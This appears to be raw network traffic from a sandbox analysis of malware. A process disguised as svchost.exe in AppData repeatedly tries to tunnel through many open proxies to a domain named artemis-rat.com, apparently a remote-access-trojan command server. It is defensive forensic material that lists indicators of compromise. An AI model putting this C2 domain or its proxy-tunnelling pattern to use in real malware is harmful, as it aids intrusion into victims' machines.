Mar 9, 2024 13:14:29.726768017 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2313	192.168.2.5	57263	156.67.217.159	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.734330893 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.065337896 CET	327	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2314	192.168.2.5	57297	51.210.223.9	3000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.748814106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2315	192.168.2.5	57479	162.159.242.158	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.754405022 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.915501118 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2316	192.168.2.5	57277	185.81.153.162	3389	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.763694048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2317	192.168.2.5	57322	60.188.102.225	18080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.766731024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2318	192.168.2.5	57494	104.16.81.76	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.767508984 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.921766996 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2319	192.168.2.5	57338	60.246.122.244	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.774931908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2320	192.168.2.5	57298	39.105.27.30	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.777338028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.143270016 CET	38	IN	HTTP/1.1 200 OK content-length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2321	192.168.2.5	57513	172.67.35.15	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.777667999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.931878090 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2322	192.168.2.5	57327	150.109.243.156	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.778357029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2323	192.168.2.5	57281	101.133.175.251	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.778844118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.645768881 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.833743095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.942864895 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.146334887 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2324	192.168.2.5	56355	194.233.78.142	35513	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.784127951 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.442672014 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.146583080 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2325	192.168.2.5	57375	158.255.215.50	16993	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.789622068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.129606009 CET	339	IN	HTTP/1.1 403 Forbidden Server: squid/4.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html;charset=utf-8 Content-Length: 5 X-Squid-Error: TCP_RESET 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from proxy.wakoopa.com Via: 1.1 proxy.wakoopa.com (squid/4.7) Connection: keep-alive Data Raw: 72 65 73 65 74 Data Ascii: reset

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2326	192.168.2.5	57201	117.160.250.133	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.791979074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.320293903 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2327	192.168.2.5	57307	8.219.177.134	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.795691013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2328	192.168.2.5	57284	47.106.112.207	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.805583954 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.170269966 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Mar 9, 2024 13:14:30.171813011 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.20.1 Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2329	192.168.2.5	57359	47.56.110.204	8989	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.805671930 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.121834993 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.16.1 Date: Sat, 09 Mar 2024 11:59:35 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2330	192.168.2.5	57220	122.114.232.137	808	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.806375980 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2331	192.168.2.5	57571	104.20.24.214	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.811065912 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.965230942 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2332	192.168.2.5	57314	139.129.162.65	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.814203024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.195379972 CET	1286	IN	HTTP/1.1 503 Service Unavailable Server: squid/3.3.8 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 3556 X-Squid-Error: ERR_DNS_FAIL 0 Vary: Accept-Language Content-Language: en Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 